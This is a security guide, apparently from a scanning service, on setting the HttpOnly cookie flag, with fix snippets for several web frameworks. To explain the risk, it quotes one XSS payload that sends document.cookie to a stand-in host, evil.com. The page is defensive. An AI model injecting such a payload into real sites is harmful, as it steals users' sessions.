Skip to main content

Cookie HttpOnly.

Security Headers & TLS Config

Prevents JavaScript from reading cookies — blocks XSS session theft

What does this check test?

The `HttpOnly` flag is a cookie attribute that prevents client-side JavaScript from accessing the cookie via `document.cookie`. When set, the cookie is only sent in HTTP requests to the server and cannot be read, modified, or deleted by scripts running in the browser. This applies to both first-party scripts and any third-party JavaScript loaded on the page, including injected XSS payloads.

Why does it matter?

The most common goal of an XSS attack is to steal session cookies. An attacker who injects `<script>fetch('https://evil.com?c='+document.cookie)</script>` can exfiltrate all non-HttpOnly cookies to their server, then use them to hijack the victim's session. The HttpOnly flag completely blocks this attack vector. Even if an XSS vulnerability exists in your application, HttpOnly cookies cannot be accessed by the injected script. This makes session hijacking via XSS significantly harder.

Who is affected?

Every application that uses cookies for authentication or session management must set HttpOnly on session cookies and authentication tokens. This includes session IDs, JWT tokens stored in cookies, CSRF tokens, and any cookie containing sensitive data. Cookies used exclusively for client-side purposes (e.g., UI preferences or theme settings) may omit HttpOnly if JavaScript needs to read them, but these should never contain sensitive data.

Where does this apply?

The HttpOnly flag is set when the cookie is created, either via the `Set-Cookie` HTTP response header or programmatically in your server-side code. Review all `Set-Cookie` headers in your application and verify that session-related cookies include the `HttpOnly` attribute. Check in browser DevTools under Application > Cookies to see which cookies have the flag.

How to fix it

Set HttpOnly when creating cookies in your application.

Node.js / Express

js 
res.cookie('sessionId', token, {
  httpOnly: true,
  secure: true,
  sameSite: 'lax',
  maxAge: 3600000
});

Django (`settings.py`) — enabled by default for session cookies

python 
SESSION_COOKIE_HTTPONLY = True  # default is True
CSRF_COOKIE_HTTPONLY = True

Flask

python 
app.config['SESSION_COOKIE_HTTPONLY'] = True  # default is True

Next.js

ts 
// app/api/login/route.ts
import { NextResponse } from 'next/server';
const response = NextResponse.json({ success: true });
response.cookies.set('sessionId', token, {
  httpOnly: true,
  secure: true,
  sameSite: 'lax',
  maxAge: 3600
});

Spring Boot

java 
// application.properties
server.servlet.session.cookie.http-only=true

// Or programmatically:
Cookie cookie = new Cookie("sessionId", token);
cookie.setHttpOnly(true);
cookie.setSecure(true);
response.addCookie(cookie);

PHP

php 
setcookie('sessionId', $token, [
  'httponly' => true,
  'secure' => true,
  'samesite' => 'Lax'
]);

the raw `Set-Cookie` header

Set-Cookie: sessionId=abc123; HttpOnly; Secure; SameSite=Lax; Path=/
Most session management libraries set HttpOnly by default, but verify this in your framework's configuration. Test by opening the browser console and running `document.cookie` — HttpOnly cookies should not appear.

References

AppVet checks Cookie HttpOnly automatically

Run a free security scan and get a full report with actionable fixes, including a Fix with AI prompt you can paste into any coding tool.

Run Audit
← All checks